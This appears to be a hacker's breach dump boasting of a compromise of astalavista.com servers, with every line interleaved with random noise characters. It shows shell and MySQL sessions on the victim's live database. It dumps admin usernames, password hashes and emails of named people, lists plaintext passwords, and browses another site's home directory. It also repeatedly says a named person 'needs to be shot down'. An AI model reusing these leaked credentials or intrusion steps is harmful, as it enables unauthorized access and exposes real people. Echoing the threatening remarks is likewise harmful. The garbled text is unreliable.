<title>ASTALAVISTA.com - Exploits</title>% S5 R- k8 \8 h5 r+ _
<link>http://www.astalavista.com/exploits</link>
2 e7 q5 e4 j* E; j1 i: W& ^ O$ \/ O <description>All availably Exploits.</description>
: Y3 m, g8 v1 A: c" ^ <language>en-us</language>
9 R& `: g: v j* a% |: ^, | <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>: }) l. b8 ]. T/ u7 y
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
8 r1 x! @. a5 S6 y1 K# K <generator>Astalavista.com</generator>
8 ^) j( |& g7 _! | <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
: U" C( f, s G$ z3 x0 Y </channel>
3 A; p1 f' e4 g( \$ b N</rss>’;: j' o* U* T9 R0 I9 |6 X
" s# `4 F0 Y3 D! v* {: ?
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
/ k2 W! b: f2 E; ?8 R5 o% U unlink (FULLPATH . ‘/feed/exploits.xml’);
% b0 V" m J7 U. e# } }! G1 _- H0 \8 i8 ~" s( {
0 [; M6 p- {; ^1 m* I2 } file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
7 K" o h1 ^4 t3 p1 B* i! K# e& `[snip]
$ Z( @0 \. Y; u) A% g- G
. o& l: n. m0 k8 Dsh-3.2$ cat exploits.sh
8 c9 L$ Q% L8 s. J6 F% b! D#!/bin/sh3 s7 S3 F9 m6 N; n
. i2 T% f7 N2 ]7 ?- B0 D! }3 }: U5 U( B###########################################################
5 }& P% X8 Q" T- s4 W- ^# #
/ j8 V. R0 a& J$ s# Title: milw0rm exploits adder #: u/ z) i, r) u6 L: `0 u2 {
# Description: Add all milw0rm exploits to the #
% \8 D1 @9 B6 S! x: X4 [) o! R# Astalavista.com database #
0 s ]1 C1 @( U7 k; j _+ q9 H# #
( w1 f: X4 o; |# Company: Astalavista Group #! _6 n4 x7 Y4 R0 J8 ~6 D/ X5 {+ H
# Author: Paulo M. Santos #
5 o' ^) B6 S$ l$ @6 w" p+ [# E-Mail: 链接标记paulo.santos@astalavista.ch #, }6 q2 f* d |
# #: F! S9 V: r" o" H) {1 _# c
###########################################################
0 V6 [* u' W4 t- F/ w7 {* B0 r2 T! m0 J# h
# path
7 J% n. G5 [; h0 s9 a* B* H/ f) }this_path=/home/com/public_html/modifications/cronjobs
! _& F- f0 R0 G# h: D5 z5 t3 x, p8 d+ [! N5 G
# change directory
2 i1 d3 v% W( d) bcd $this_path
" q0 w8 x& J# I p3 v* c/ gcd tmp/" P4 P3 ^% l) Y
3 d: M* _" h3 i! I: \" e0 Q
# delete files
9 d9 \5 O3 @. p) g0 Zrm -rf milw0rm.tar.* &
' f' a- E& B! N0 Rrm -rf milw0rm/ &
, e8 m, L" @, c, ~* O
& f9 ~. [: `" E% r9 E# wget milw0rm paket G1 [/ J) `; a2 V# w
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]( {# h' S3 M9 B0 V, C& t
4 B3 ~4 L7 [" i; ]: C% E: \
# extract milw0rm paket
5 B( o& m6 S7 k4 u+ [tar -xvf milw0rm.tar.bz2
1 Q! I n$ s. ~: g# D" L9 D% P4 Q
& l8 v! h# R F. v3 @$ s# change owner1 s$ A- |0 K2 G/ ]' Y' y% ~( K9 ^- x* @
chown -R com .3 `! v% V) [% i/ h$ j* Z0 R0 o9 {
chgrp -R com .
9 \2 r! M4 i, @1 j3 p. E1 y/ E# G& j
9 n$ L8 g# N$ A# v, {# execute php script# E [" Q a& ]# s7 ^
cd $this_path
: N, x5 l& ^# k) F. v$ H, Fphp -q exploits.php
- V- ~( o& f2 Y" t" E7 P" w" x+ t+ H; l. w+ x
# delete files
" M, y8 I9 Q$ F$ m* T1 Wrm -rf tmp/milw0rm.tar.*5 o( O# a4 Z3 G6 B8 N
rm -rf tmp/milw0rm/
# c( V& \4 K0 B8 l: c' l. O2 v: [; A1 j/ f& b! X
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
9 t1 g2 V3 B4 q6 ]8 K2 E1 B. TPaulo M. Santos needs to be shot down.
2 s% r( c1 B; Y/ I+ {( {' B( K2 l
mysql -u contrexxuser2 -p8 U, Y3 B" a3 C
Enter password:
. C9 r/ z+ b$ d @" sWelcome to the MySQL monitor. Commands end with ; or \g.
+ N. _' `0 {; u- _/ Q0 |- RYour MySQL connection id is 261694
! z) W3 O! k! V9 `* eServer version: 5.0.45-community-log MySQL Community Edition (GPL); _9 C( q9 D7 ?' i; _$ [/ W
& q& y! T j0 U1 GType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
c1 P% n0 B0 P( J" [
8 Y$ L7 m; O" M) w/ d9 W3 dmysql> show databases; t! n2 f3 F1 M* O9 }/ N
+——————–+$ I+ T$ y0 S; }: I5 e+ _
| Database |- t/ C/ ?' e* f" e) d
+——————–+7 U- p5 K+ X' E( G
| information_schema |
v ~0 ~/ }7 L5 l7 {) L| com_contrexx2 |# Z5 |4 Z8 A, X1 D! m& H! x; I
| com_contrexx2_live |
: `( V. K# ?/ L- R3 T; N| test |# q, i0 g& }$ b9 Y, [* t1 h0 P& {, N
+——————–+
" C) D+ `% o, R ~/ H$ ^8 b4 rows in set (0.00 sec)
% |0 V' {3 }9 G* @3 Y; T: I1 W
. c. l$ H( u4 M0 k5 }mysql> use com_contrexx2_live& a" ~; {5 Y8 [+ t9 X- f
Database changed
1 g# |7 u$ E- }2 r% @mysql> show tables;. K3 e4 q2 V* s0 W
+————————————————–+0 s2 a: X6 M' s: S& E
| Tables_in_com_contrexx2_live |3 G9 |* v* W2 ]! t9 }+ w7 {
+————————————————–+. r% d8 c/ L$ ^9 O
| cc_banner_counter |8 ]& B, W( {( Z
| cc_search_counter |
9 f) B1 o) j! A! k$ j2 @| contrexx_access_group_dynamic_ids |. ?* b1 K& A+ w5 k: |
| contrexx_access_group_static_ids |
' u- @; q! T9 Z| contrexx_access_rel_user_group | C* O( @* Y; P& X5 q
| contrexx_access_settings |
1 i- y. t7 |6 v9 M- O+ f; D8 h Y| contrexx_access_user_attribute |
5 o0 S |% i# x( U, H% R' z* F4 m3 T| contrexx_access_user_attribute_name |5 v1 U" q4 R0 F7 R9 x9 X) o E8 B
| contrexx_access_user_attribute_value |
; E# N0 I4 p4 C! ]4 @9 \; Z| contrexx_access_user_core_attribute |! H7 {- ~+ {4 Q9 S( _
| contrexx_access_user_groups |. z o c$ W9 O& W: K$ u5 ]
| contrexx_access_user_mail |' L5 W# r9 ?3 q! c0 x
| contrexx_access_user_profile |
6 P, |8 P$ c* o) B. ^+ F1 N0 G| contrexx_access_user_title |5 P# ^1 o& s+ f; |1 j5 r3 A, d0 {
| contrexx_access_user_validity |
^' V/ \ T( f. ~" @| contrexx_access_users |! N) U' E2 t0 D& [( p' [
| contrexx_backend_areas |
8 Y' B" s1 `7 A) o' ?| contrexx_backups |7 I: S( D0 ?. u, z! O9 ^" [9 v
| contrexx_content |
# N+ f* R% Z( l5 M$ Z9 j9 T* f| contrexx_content_history |7 }! e3 Z! j2 t" ^8 p. d1 b
| contrexx_content_logfile |
* ] W$ p! {% ~1 ^: M| contrexx_content_navigation |
2 |: y+ A8 k8 Q @* Q| contrexx_content_navigation_history |
: O) `2 |) x6 `' U| contrexx_ids |
0 V$ o: J& V6 t& \9 c% j| contrexx_languages |
0 P7 p+ G& W# @- S' G/ E1 T' a| contrexx_lib_country |2 E9 ~0 E9 [& w7 l$ U
| contrexx_log |
}) P+ V9 z. \ A5 @8 _$ \' p: v+ w| contrexx_module_alias_source |
' q% M9 e5 B/ W8 W" j2 \| contrexx_module_alias_target |
8 P- l8 a) h v# f: d3 r| contrexx_module_block_blocks |
7 v; ?6 i$ ?: ` `, U+ T| contrexx_module_block_rel_lang |; A- a+ |4 e6 R) m/ [# d& Y
| contrexx_module_block_rel_pages |; C9 Z( B! ~/ j, `- q
| contrexx_module_block_settings |
$ {, q% Q" H8 J5 P5 \. l| contrexx_module_blog_categories |0 N. @* Z% J) F9 v. r! N
| contrexx_module_blog_comments |
. H, y m6 O3 B: J& y9 y% a! L| contrexx_module_blog_message_to_category |
5 E3 ?$ |# Y0 Q1 [ ?1 V: O| contrexx_module_blog_messages |4 S4 A( M' N# z, D9 y- W5 n+ i2 w
| contrexx_module_blog_messages_lang |$ @0 X& p" c; L* N- ?- S2 X7 `
| contrexx_module_blog_networks |
8 ^8 i! O+ [. J; Q1 k1 ~' j. U+ k| contrexx_module_blog_networks_lang |
% w4 ?# D- L9 k& G. z3 } w6 e2 u| contrexx_module_blog_settings |
$ |& c3 U* l$ `, J* R, m| contrexx_module_blog_votes |
! }/ I# R! j9 t, {4 P( i" M| contrexx_module_calendar |
+ ]. G0 H4 Q' \: h| contrexx_module_calendar_access |% K6 X# c0 g# `4 w
| contrexx_module_calendar_categories |) t r: r8 F# C* ]6 P# T; O
| contrexx_module_calendar_form_data |
/ v+ v& y- a6 f# N| contrexx_module_calendar_form_fields |$ O! f, M% D% r2 P
| contrexx_module_calendar_registrations |- k Y% I' _; {: Q: I
| contrexx_module_calendar_settings |
) L4 e% k: L5 y( d& @( u: b" { o* U| contrexx_module_calendar_style |
4 {8 E% b' A0 \7 i) ?| contrexx_module_contact_form |
9 j% H( r: H' p) j, o8 N| contrexx_module_contact_form_data |8 c. f( U* @+ A3 j
| contrexx_module_contact_form_field |
. U) v3 ~- L8 p| contrexx_module_contact_settings |! m# k& i6 n- ?
| contrexx_module_data_categories |
; r0 p7 m0 v( d5 Y| contrexx_module_data_message_to_category |: q8 j6 r9 E( L: t1 E5 G
| contrexx_module_data_messages |
$ O& C; d' ]0 @# w| contrexx_module_data_messages_lang |
, w" {- e5 z/ Q& @2 G/ y% g0 R: h| contrexx_module_data_placeholders |
9 I9 W5 K5 m/ f% ]/ _( m| contrexx_module_data_settings |
' b! ?* O, O9 l| contrexx_module_directory_access |
6 p' d; W+ _7 l" N' n+ q+ J$ u4 u| contrexx_module_directory_categories |
. K& {2 I# l( F+ u; j6 d4 W| contrexx_module_directory_dir | e" a; j/ r: Y0 c# i6 B
| contrexx_module_directory_inputfields |
: d3 F; x+ c! f5 G$ D| contrexx_module_directory_levels |
* K2 {- ^0 F* ]9 ]6 K8 }7 S| contrexx_module_directory_mail |
0 U$ g% _! s; Z) k+ f9 z" J ]0 q| contrexx_module_directory_rel_dir_cat |# f8 L( ]( R5 S7 u z7 m6 s! R# @
| contrexx_module_directory_rel_dir_level |7 y' n! ~ a* l' v a6 J
| contrexx_module_directory_settings |2 U4 [( X" z; w+ v; I
| contrexx_module_directory_settings_google |. j/ u3 L( F2 Q! B6 G5 Q
| contrexx_module_directory_vote |
Z4 W' \6 k( R: Y| contrexx_module_docsys |
2 L `9 [: j0 c. m7 [# F# }8 g| contrexx_module_docsys_categories |; Y2 e' F" \2 n- q1 F/ |! Z2 r
| contrexx_module_egov_configuration |
7 |& j' `- z6 L/ N- |5 V| contrexx_module_egov_orders |. V+ C! W* Y, \, ^ p- W% ]
| contrexx_module_egov_product_calendar |
9 F7 c! J' P% s7 m7 Z8 D% ]| contrexx_module_egov_product_fields | J. H, r! b7 N/ Q" K
| contrexx_module_egov_products |- N, B; i' V0 s3 b# D7 a
| contrexx_module_egov_settings |- n( k n4 P, T7 h. O9 p
| contrexx_module_exploits |
& b! k; Q8 ]0 E$ T3 A$ W| contrexx_module_exploits_categories |/ x9 m7 Q4 v9 @8 L6 r
| contrexx_module_feed_category |
8 W4 M" g( I1 B: M" `7 c+ @| contrexx_module_feed_news |" B% k% w# E4 B$ Q( H
| contrexx_module_feed_newsml_association |
& r! U2 Y: i6 M, u6 f| contrexx_module_feed_newsml_categories |
7 j3 J2 q+ q2 A4 B% `| contrexx_module_feed_newsml_documents |
t: i. S3 v% S' a| contrexx_module_feed_newsml_providers |8 z8 E8 B, F$ q- {; k0 }
| contrexx_module_forum_access |" I) P( W. P7 v9 {$ | g0 u+ W
| contrexx_module_forum_categories |: E% B! x5 H v* a( c! ] g; v
| contrexx_module_forum_categories_lang |& L5 K o: M9 e B
| contrexx_module_forum_notification |+ A& `# _0 u* v" I/ B
| contrexx_module_forum_postings |
9 w" e/ B; b+ I3 u% d/ X| contrexx_module_forum_rating |/ ?+ X# A, F6 H4 [
| contrexx_module_forum_settings |6 k! `( Z# V9 d
| contrexx_module_forum_statistics |
% v( _7 J4 X( c| contrexx_module_gallery_categories |: t: {2 U( w3 A5 e' P. `
| contrexx_module_gallery_comments |. w7 y# s# I# G/ r/ U# I
| contrexx_module_gallery_language |- O& G- S7 `( Y# _# {6 Y
| contrexx_module_gallery_language_pics |
0 t! N9 p9 Y8 y5 P F4 n4 a T| contrexx_module_gallery_pictures |
9 n k; W5 f& P8 l5 C% u7 Q| contrexx_module_gallery_settings |; o2 H# I" h( Q5 T' j
| contrexx_module_gallery_votes |/ b- ]; A# s% {. C* J
| contrexx_module_guestbook |6 A3 h: o5 | h
| contrexx_module_guestbook_settings |
% q' `1 T! t+ m9 l+ M; Z| contrexx_module_livecam | T/ S/ w! Q$ B, ?( r v0 {
| contrexx_module_livecam_settings |
' p7 U% {2 B u% _5 d| contrexx_module_market |
5 Q y/ s" C3 `, p& b* C M. [" K| contrexx_module_market_access |
$ V# e8 P; P" z1 x2 a# P! `6 ]| contrexx_module_market_categories |
% w7 t/ W5 B0 I2 Z/ v9 P| contrexx_module_market_mail |
( Z: D' [( {# K| contrexx_module_market_paypal |- b% H( D3 ~4 F6 U1 R' |
| contrexx_module_market_settings |. g: ?' b$ \ X+ q8 b
| contrexx_module_market_spez_fields |
$ ?* Q* c5 u. _# q| contrexx_module_mediadir_access |# h' h3 ?8 Y- N c( v9 K
| contrexx_module_mediadir_categories |) l; _, _! j, K1 S! g
| contrexx_module_mediadir_comments |
* \- }% u& Z7 r5 `1 E) }& o| contrexx_module_mediadir_dir |
) ]. S2 O/ d3 @1 Z2 j4 S| contrexx_module_mediadir_inputfields |
; s! J: S0 v$ W$ q$ a e0 c7 {0 ^| contrexx_module_mediadir_levels |
$ r1 f# A- R. O, ~! Y% j5 ^| contrexx_module_mediadir_mail |
+ c b3 ?3 S, S" v| contrexx_module_mediadir_rel_dir_cat |
# N" {6 [' ~! ]| contrexx_module_mediadir_rel_dir_level |+ K+ c0 R, u1 U) j
| contrexx_module_mediadir_reports |
- T/ G7 }" B* ]- `1 y| contrexx_module_mediadir_settings |
% @. Z; d1 H9 _/ a. R4 ?' b| contrexx_module_mediadir_settings_google |
# m. {, ]- O2 K7 @% d| contrexx_module_mediadir_vote |2 b5 X$ H N. D9 N" f/ k
| contrexx_module_memberdir_directories |* d* B* n# z- E0 [
| contrexx_module_memberdir_name |
$ m& Z/ _/ u5 X# A; ^$ s2 O| contrexx_module_memberdir_settings |
& S# h: u2 s" B/ m4 G| contrexx_module_memberdir_values |: T4 I1 L5 T" r. c" v5 t
| contrexx_module_nettools_allowed_groups |% g6 o' a5 }: a; w; U
| contrexx_module_nettools_settings |
+ a2 a9 m+ w$ B r$ W| contrexx_module_news |
7 C8 k9 i- E H( @! K/ u5 o| contrexx_module_news_access |* t( @! g. v( l6 y/ ]7 z j
| contrexx_module_news_categories |
3 G( C6 M# ~% V* B y| contrexx_module_news_settings |2 S9 X- ^' H# a; S
| contrexx_module_news_teaser_frame |2 ]6 z+ h5 O9 u1 T
| contrexx_module_news_teaser_frame_templates |
% i. H: d/ i8 J) z' O7 ]4 h| contrexx_module_news_ticker | w' G: h, f# x5 C
| contrexx_module_newsletter |# @; y. ^7 `" j0 f
| contrexx_module_newsletter_attachment |6 p6 U1 j* C0 U. u
| contrexx_module_newsletter_category |9 u. t1 J0 p9 x$ E: }
| contrexx_module_newsletter_confirm_mail |/ R% _& w* m$ k/ G% o
| contrexx_module_newsletter_rel_cat_news |
+ w1 N5 J) b! ~8 ~+ y| contrexx_module_newsletter_rel_user_cat |
2 q- W: j0 H- x) N| contrexx_module_newsletter_settings |
# h2 g1 a1 _# y( T- \. `5 {+ s| contrexx_module_newsletter_template |
4 b+ H% Y7 m' G+ Y. V| contrexx_module_newsletter_tmp_sending | P8 F. q- e& k' l% T
| contrexx_module_newsletter_user |
1 R- u# V! |& B( N# N| contrexx_module_newsletter_user_title |
! S/ o( \) e# X! q0 G& F5 F; E| contrexx_module_onlinetools_defaultports |
, b- u; n F% M/ y+ w| contrexx_module_onlinetools_defaultports_back | x; S1 |2 N* P0 j" l
| contrexx_module_onlinetools_geolitecity_blocks |8 b) @3 A! h7 z' I" T
| contrexx_module_onlinetools_geolitecity_country |
% p3 c6 R5 F1 o) {- O& G+ c% i| contrexx_module_onlinetools_geolitecity_location |
* K8 D6 w7 T: w9 t- }| contrexx_module_podcast_category |& ^5 j0 [# h! y8 q0 w. m
| contrexx_module_podcast_medium |: I9 _$ U0 V" c m9 E* V) y! D) \9 q
| contrexx_module_podcast_rel_category_lang |7 r0 c. ]7 I$ M; Q
| contrexx_module_podcast_rel_medium_category |( L: ~1 O3 J9 e
| contrexx_module_podcast_settings | X Y8 V! b, E$ P9 R
| contrexx_module_podcast_template | I6 [/ ^- Z f/ ~( u3 i8 { v
| contrexx_module_proxydb |8 {7 e+ T; g7 @( G
| contrexx_module_recommend |
, S8 v9 g% \# ^4 [| contrexx_module_repository |
$ B: M/ V/ A4 O| contrexx_module_securitynews_cats |4 ]" I, \7 ~' e+ T/ ?& q K
| contrexx_module_securitynews_feeds |: Y- _" q3 Y o* z/ T! u1 I
| contrexx_module_securitynews_news |3 m5 K( e; n' O( T% W3 ^! I
| contrexx_module_shop_categories |
2 B1 I6 {$ ]/ f| contrexx_module_shop_config |
8 h" t5 l8 D0 E3 \, P: ^| contrexx_module_shop_countries |$ Y* b1 j& ^+ q
| contrexx_module_shop_currencies |6 a& t: y/ H* E6 l" e& ]+ k: {+ ^. m
| contrexx_module_shop_customers |
) h% D! P: c0 @| contrexx_module_shop_importimg |) \) M1 s2 t. R% M
| contrexx_module_shop_lsv |
/ l9 x" o" Q7 ~. t7 s- {| contrexx_module_shop_mail |
2 S) N" B) J/ E; `| contrexx_module_shop_mail_content |
' M6 E: {% k# c6 ^| contrexx_module_shop_manufacturer |
, d% G$ c# o- L; n; l0 y( i; d| contrexx_module_shop_order_items |9 Z n0 P# c1 S: \/ z
| contrexx_module_shop_order_items_attributes |
6 B' C* x7 a4 u$ @| contrexx_module_shop_orders |
0 ?5 V- M4 y$ L, d| contrexx_module_shop_payment |& S( M7 r+ R5 J9 x* I5 M
| contrexx_module_shop_payment_processors |7 G( h/ D( D: `. f
| contrexx_module_shop_pricelists |
/ h) z" y' @: c| contrexx_module_shop_products |
1 O6 s. ?" H9 h) ^( G| contrexx_module_shop_products_attributes |
4 s4 ?; h' V: v5 g- L| contrexx_module_shop_products_attributes_name |
% n( n3 ?" M8 ?- T| contrexx_module_shop_products_attributes_value |
6 U9 E/ K( J4 {7 K| contrexx_module_shop_products_downloads |2 ]& t7 H4 ~2 z; `1 u/ n" J
| contrexx_module_shop_rel_countries |
0 v5 o+ d9 f0 E| contrexx_module_shop_rel_payment |
; G& m! G* T( f5 g4 q! @) \: A9 a4 U| contrexx_module_shop_rel_shipment |% ]4 y) M4 a: }& m
| contrexx_module_shop_shipment_cost |- W+ I5 \' i; r
| contrexx_module_shop_shipper |* j o1 e( z9 v# ^
| contrexx_module_shop_vat |
9 {0 N" _" @- \ Z, k| contrexx_module_shop_zones |2 `) z+ W+ i: l
| contrexx_module_u2u_address_list | w |+ ?# t% _7 j
| contrexx_module_u2u_message_log |: X% a0 Y: f. [9 w9 H. h4 v
| contrexx_module_u2u_sent_messages |
. g1 f4 ^7 U2 d8 Q. Y| contrexx_module_u2u_settings |
4 P2 D/ a) Z: M8 @, H+ t| contrexx_module_u2u_user_log |
9 s! ?% o- G- ~/ D" _0 @| contrexx_modules |
& U; C* W" n# s+ V% L( P5 v6 T| contrexx_sessions |
3 @+ O; j' x+ O* X: z8 F5 M. P& r| contrexx_settings |$ h+ ], i% S& H+ A) p: t
| contrexx_settings_smtp |
, j$ G, q1 ^8 @7 x) F8 F3 ~5 E| contrexx_skins |# O+ E u% F) {. ?% Y" I" F- K
| contrexx_stats_browser |6 d; M2 ?7 A$ H( v' `, G2 P
| contrexx_stats_colourdepth |
: m' R5 M7 A+ }, F! q" a| contrexx_stats_config |. G: H8 r% g' r8 w; z
| contrexx_stats_country |
1 b. |# C4 ]1 ^8 O d" X% U| contrexx_stats_hostname |* L& S) Q/ v. C; h9 n- f' o2 w
| contrexx_stats_javascript |; x% c0 D( T5 W% S
| contrexx_stats_operatingsystem |
- L* W$ V. v, X9 m, l| contrexx_stats_referer |
/ T9 r* s! g: \3 f- K| contrexx_stats_requests |) H ]; W% B B6 @! l* C
| contrexx_stats_requests_summary |. L( { {3 F' J' Q
| contrexx_stats_screenresolution |
* F; r6 s6 O9 ]- \4 E+ K| contrexx_stats_search |
F! U3 u1 q( C; Q* z, f8 h| contrexx_stats_spiders |
5 n8 _' H; [ n$ I: r; q; F| contrexx_stats_spiders_summary |8 F5 |& A% J8 N2 M+ U
| contrexx_stats_visitors |
2 v) M5 h1 Y {6 z3 d| contrexx_stats_visitors_summary |
: e8 f& |8 f& d# e0 L# ^8 H| contrexx_voting_additionaldata |# t+ o; G, r, I# W
| contrexx_voting_email |
& H$ i- U* d& N$ e* w; X: a1 s| contrexx_voting_rel_email_system |( w: j* r% Z$ M' i; _+ H6 b* f$ G2 J
| contrexx_voting_results |
" l4 {* K+ |# b0 Q/ c% a2 `| contrexx_voting_system |
9 q+ n$ }. M! f- k$ g; j, \5 V| foo |6 }4 Q( X& L) }. V( h
+————————————————–+, `( t% V. j9 u5 Y: m8 ^4 T
227 rows in set (0.01 sec)
" Z! I+ Y' F) K( _$ {; M( q9 p: l, R7 l
mysql> select count(*) as skids from contrexx_access_users; p( Y/ T* O1 F
+——-+
2 t, Q! m/ Q6 a7 F( ^# W5 r4 B| skids |
. f% y3 M( \0 e" E! z9 }+——-+
# a4 Q! p5 O- S$ V; E( z| 53699 |
$ B, g' q* G8 I! h& S+——-+: d/ Y5 S" J) f6 d" e! r# w6 x7 F
1 row in set (0.00 sec)
x' \ Y7 Z' ^5 ~/ e1 k% I$ J2 f
mysql> describe contrexx_access_users;# A3 |. V3 N9 [/ G+ ?% N
+——————+——————————————+——+—–+————–+—————-+- k+ w( p% P! Z* `0 H' g7 U
| Field | Type | Null | Key | Default | Extra |
' E) ]) m+ f3 r2 x* Q6 y: g+——————+——————————————+——+—–+————–+—————-+
5 f! F! c0 ]. k; o" L, a| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
+ ^ ^( w0 e; h4 ]| is_admin | tinyint(1) unsigned | NO | | 0 | |
6 [& V4 C' {9 U! w& }% n. Y| username | varchar(40) | YES | MUL | NULL | |
, y: X+ c9 x. [| password | varchar(32) | YES | | NULL | |2 z" y6 u8 _' k- W/ ]3 g& j6 H* |0 |
| regdate | int(14) unsigned | NO | | 0 | |# s, O3 v$ N0 W+ E$ r
| expiration | int(14) unsigned | NO | | 0 | |
0 ]/ J- Y5 b0 P5 T' J1 J, R& R+ l* N| validity | int(10) unsigned | NO | | 0 | |
' q l" S( y& P% Z) Q| last_auth | int(14) unsigned | NO | | 0 | |# [2 F0 c8 }) g% R
| last_activity | int(14) unsigned | NO | | 0 | |
0 h3 z" R9 e- O8 q2 r B& r' f& h| email | varchar(255) | YES | | NULL | |
' u' [" }9 U M1 {9 d& ~( C) y, p| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
/ B& P) [& ]5 n g& A| frontend_lang_id | int(2) unsigned | NO | | 0 | |% J& t( C/ g6 \; _
| backend_lang_id | int(2) unsigned | NO | | 0 | |7 `3 b. t3 ?' M+ A8 O9 v8 t: H
| active | tinyint(1) | NO | | 0 | |! r9 p, n- G' w2 o3 m5 h
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |! o4 n: {4 d8 u$ }# g- p1 L" s
| restore_key | varchar(32) | NO | | | |& b6 {1 r; J( O4 \2 M* V/ y& b
| restore_key_time | int(14) unsigned | NO | | 0 | |
) [4 C3 S1 a$ w* b: {3 H7 @| u2u_active | enum(’0′,’1′) | NO | | 1 | |/ W+ v9 ?% ~4 |5 A- l4 z
+——————+——————————————+——+—–+————–+—————-+
% p) F/ R& S, _. o K/ A5 u18 rows in set (0.00 sec)
: ?0 ~ U% ~! \1 V! k
" L9 G9 m1 @3 m6 Y$ T: Bmysql> select username,password,email from contrexx_access_users where is_admin = 1;* }2 W0 t9 D+ j4 I. k* I: [) H0 s
+————+———————————-+—————————–+( S$ \2 m& f1 M; m# T+ P) H4 s' E
| username | password | email |% d5 L8 k7 W& J: a5 E8 Y) p
+————+———————————-+—————————–+
5 A% |# X9 `; t| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |& m/ g; n& W$ b& i6 p8 D/ l. W
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |: {4 z n+ E+ |( ]$ Y4 N7 O
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |$ C6 _: O; h! x8 _* x1 B9 i% I: R
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |+ [ O( n& K, X# {/ M
+————+———————————-+—————————–+
: \2 B5 n* {( E6 X" q4 rows in set (0.04 sec)
7 L6 w" Q. x6 t$ D I% F3 t) c! Q/ ]. X0 y0 S Y# Z
mysql> exit;. U" d2 d3 y" M9 g3 {
Bye1 w: x: o# ]: p5 F, S' y
1 l2 z! B; I4 i+ V5 l' @8 K[~] There you go, your “team of security and IT professionals” is a joke.
4 s; m% R7 z0 G7 ?; b" s
r6 ]" m ]4 \& w- {7 ~+——————————+5 u ?5 R. E, N2 }
system:f82BN3+_*
3 G' H( o3 p* V" w% ^Be1er0ph0r:belerophor4astacom
3 N$ K$ T( A7 E5 Z7 a9 W7 i8 kprozac:asta4cms!
5 {3 _' T, y" J/ O1 Mcommander:mpbdaagf6m
* E% C2 W0 h# X: [3 |% p! u4 Csykadul:ak29eral" y9 B% g# E/ ^: O- P
+——————————+9 @. R b2 }0 [4 Y* G* R
& h! E2 {( g8 r3 G& X[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s). _. Q; C1 h$ g5 w) G
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.- f% v W1 w% m! q* g6 O
0 X- u. @$ A2 k# D[~] Lets move to astalavista.net now,- M( H- R! b6 x: X8 f" J# |0 `) e
) k! r5 ]/ C5 @# ]1 k0 {From <链接标记[url]https://www.astalavista.net/[/url]>:
, u1 k. t& v3 N, o& z>> Everyone knows that the best defense is a good offense.
( d4 c( g# O+ _ x: c>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.2 ^4 m+ x1 R9 b, G
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
( | ~% G. Q+ q% Q>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
' o9 }5 [5 K) e8 n0 r. f1 O) P- i# [- r) s
>> Go ahead, try and hack our server . in a completely legal way!) X: ]. J, p. d: P2 u8 p" F: }
>> Learn by doing: We offer our members tricky tasks and challenges on an
& B* W% O% z$ o( C. J>> ongoing basis so you can test your knowledge and abilities. You can also
) N" d0 R! K' H* K" U/ X>> demonstrate what you.ve mastered by taking part in regular hacker contests
3 `# Q+ L* t. V$ \ S$ X+ }- c>> and war games
( k5 ?( D& S% I8 G) N& J
% z8 Z8 ^+ M) k8 ^[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
0 e* l: x# i; @8 o+ B! q+ d& ], T3 G+ f) Z. t9 v
[-] Tricky task: Find home dir of astalavista.net; Y3 Z3 \+ q l2 l- L- k& e: ?
4 a1 g1 {, ]4 N' v, h: M
sh-3.2$ ls -la ~astanet
& o, j3 d1 h% s. [total 48
8 }3 ]4 A5 H/ y7 ]# sdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .: ~- q6 O. l7 t1 t! J
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..5 K5 s) M" a# C& X7 P) R: \
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
! t( a( W, E: O* I- j-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
, \% @# \: L6 u+ B& J. ^" \-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
, n8 a( n, t6 x9 ~-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
. U6 G+ D9 _' A8 {3 z6 }-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc% `& m/ |4 }6 d8 ?
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
5 g+ `$ a; _3 k5 p- K* rdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap$ ?1 n3 R: S, D! U" E
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail- u( b" W: s5 i. k( f; E' A
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
* Y M7 ]; e/ r3 D5 g, Q& ?8 }' S-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
% E* ~1 L" X3 W" G" @* x% V* }" k1 f. R0 s
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
- o" a/ r, c3 |9 k: ~sh-3.2$ ls -la
5 k& P2 v$ l8 v( R: Jtotal 200
1 y% Z: ^/ o6 ~% ^8 w- X& idrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .( ]. F) ]* Z1 }7 o
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
